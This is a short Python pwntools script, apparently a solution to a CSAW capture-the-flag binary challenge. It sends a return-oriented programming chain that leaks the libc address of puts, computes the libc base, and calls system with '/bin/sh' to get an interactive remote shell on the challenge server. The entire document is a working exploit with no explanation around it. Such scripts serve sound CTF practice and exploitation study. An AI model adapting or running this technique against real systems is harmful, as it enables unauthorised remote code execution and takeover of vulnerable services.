from pwn import *
poprdi = 0x00000000004006a3
putsplt = 0x4004b0
putslibc=0x600fd8
mainstart=0x4005d6

#pe = process('./adhd')
#gdb.attach(pe)
pe = remote("pwn.chal.csaw.io",10102)
libc=ELF('./libc.so.6')
#libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')


pe.recvline()
pe.sendline(p64(poprdi)+p64(putslibc)+p64(putsplt)+p64(mainstart))
x = pe.recvline()
libcPuts = (u64(x[:-1]+'\x00\x00'))
print libcPuts
libcbase=libcPuts-libc.symbols['puts']
system=libc.symbols['system']+libcbase
binsh=libcbase+libc.search("/bin/sh").next()

print libc.search("n < d").next()
print libc.search("/bin/sh").next()
pe.recvline()
pe.sendline((p64(poprdi)+p64(binsh)+p64(system))*1+p64(mainstart))
print pe.recvline()
pe.sendline((p64(poprdi)+p64(binsh+1625367-1625299-4)+p64(system))*2+p64(mainstart))

#TODO


pe.interactive()